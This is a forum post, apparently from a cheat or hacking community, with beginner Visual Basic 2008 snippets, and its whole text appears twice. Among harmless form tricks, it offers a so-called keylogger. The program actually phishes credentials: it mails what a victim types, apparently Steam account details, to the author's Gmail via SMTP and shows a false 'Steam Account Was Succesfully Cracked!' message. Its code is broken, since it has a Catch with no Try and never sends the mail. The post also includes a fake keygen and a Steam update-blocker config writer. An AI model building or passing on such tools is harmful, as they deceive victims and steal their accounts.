FS Member
Visual Basic Programming Command's (Learner) This tutorial is for learners not advanced user's.
how to minimize the form on the click of a object or button well double click your path (button1, picturebox1 etc.)
and then in the code put this :
Me.WindowState = FormWindowState.Minimized
how to make your program create steam.cfg file's when it is run / opend
basicly add 3 textboxe's put a line of code in each box such as the steam update blocker code etc etc you get the point and then double click form1 to open it and then put this in as the code.
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Dim savef As New System.IO.StreamWriter("Steam.cfg")
savef.Write(textbox1.text + ControlChars.NewLine + textbox2.text + ControlChars.NewLine + textbox3.text)
End Sub
End Class
How to make your form1 / program play music (like a keygen)
when you open vb 2008 create a form then double click on my project then go to resources and click add new resource and select .wav format and then choose your audio file (audio file must be .wav format) then import it then go back to your form1 and double click on form1 to input the code and this is the code you will need
My.Computer.Audio.Play(My.Resources.SONG_NAME_HERE, AudioPlayMode.BackgroundLoop)
were it says (song name here) change that to what ever the resource file you imported say's and then enjoy the music your application play's
How to make a keylogger in vb 2008 :
this is extremely simple just create new project then add 2 textbox's and 1 button then open up form1 and erase all code already there so its a blank script and then copy and paste this into it
Imports System.Net.Mail
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress("[email protected]")
MyMailMessage.To.Add("[email protected]")
MyMailMessage.Subject = TextBox1.Text
MyMailMessage.Body = TextBox2.Text
Dim SMTP As New SmtpClient("smtp.googlemail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("[email protected]", "GOOGLEMAILPASSWORD")
TextBox2.Text = ""
MsgBox("Steam Account Was Succesfully Cracked!", MsgBoxStyle.Information, "Information")
Catch ex As Exception
End Try
End Sub
End Class
then when you have done that were i put googleemail etc you might want to change all that to your email adresses and password's etc and also were it say's smtp.googlemail.com you will want to change that to gmail.com if you dont have a googlemail account and your account is a gmail one.
how to build a fake Keygen :
ok well a fake keygen isnt that hard in vb 2008 since all it has to do is generate premade key's / info / word's /data name's etc you get the idea so heres the code just create 1 button and 1 text box then sit back and enjoy the keygen.
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim key As Integer
key = Int(Rnd() * 265)
Select Case key
Case 1
TextBox1.Text = "KR2X8-M8MGV-FQBRR-322YQ-QPM2Y"
End Select
End Sub
End Class
were it says case1 just keep adding cases on you can add as many as you like enjoy.
i hope you found this tutorial usefull for creating some pretty basic visual basic program's.
how to minimize the form on the click of a object or button well double click your path (button1, picturebox1 etc.)
and then in the code put this :
Me.WindowState = FormWindowState.Minimized
how to make your program create steam.cfg file's when it is run / opend
basicly add 3 textboxe's put a line of code in each box such as the steam update blocker code etc etc you get the point and then double click form1 to open it and then put this in as the code.
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Dim savef As New System.IO.StreamWriter("Steam.cfg")
savef.Write(textbox1.text + ControlChars.NewLine + textbox2.text + ControlChars.NewLine + textbox3.text)
End Sub
End Class
How to make your form1 / program play music (like a keygen)
when you open vb 2008 create a form then double click on my project then go to resources and click add new resource and select .wav format and then choose your audio file (audio file must be .wav format) then import it then go back to your form1 and double click on form1 to input the code and this is the code you will need
My.Computer.Audio.Play(My.Resources.SONG_NAME_HERE, AudioPlayMode.BackgroundLoop)
were it says (song name here) change that to what ever the resource file you imported say's and then enjoy the music your application play's
How to make a keylogger in vb 2008 :
this is extremely simple just create new project then add 2 textbox's and 1 button then open up form1 and erase all code already there so its a blank script and then copy and paste this into it
Imports System.Net.Mail
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress("[email protected]")
MyMailMessage.To.Add("[email protected]")
MyMailMessage.Subject = TextBox1.Text
MyMailMessage.Body = TextBox2.Text
Dim SMTP As New SmtpClient("smtp.googlemail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("[email protected]", "GOOGLEMAILPASSWORD")
TextBox2.Text = ""
MsgBox("Steam Account Was Succesfully Cracked!", MsgBoxStyle.Information, "Information")
Catch ex As Exception
End Try
End Sub
End Class
then when you have done that were i put googleemail etc you might want to change all that to your email adresses and password's etc and also were it say's smtp.googlemail.com you will want to change that to gmail.com if you dont have a googlemail account and your account is a gmail one.
how to build a fake Keygen :
ok well a fake keygen isnt that hard in vb 2008 since all it has to do is generate premade key's / info / word's /data name's etc you get the idea so heres the code just create 1 button and 1 text box then sit back and enjoy the keygen.
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim key As Integer
key = Int(Rnd() * 265)
Select Case key
Case 1
TextBox1.Text = "KR2X8-M8MGV-FQBRR-322YQ-QPM2Y"
End Select
End Sub
End Class
were it says case1 just keep adding cases on you can add as many as you like enjoy.
i hope you found this tutorial usefull for creating some pretty basic visual basic program's.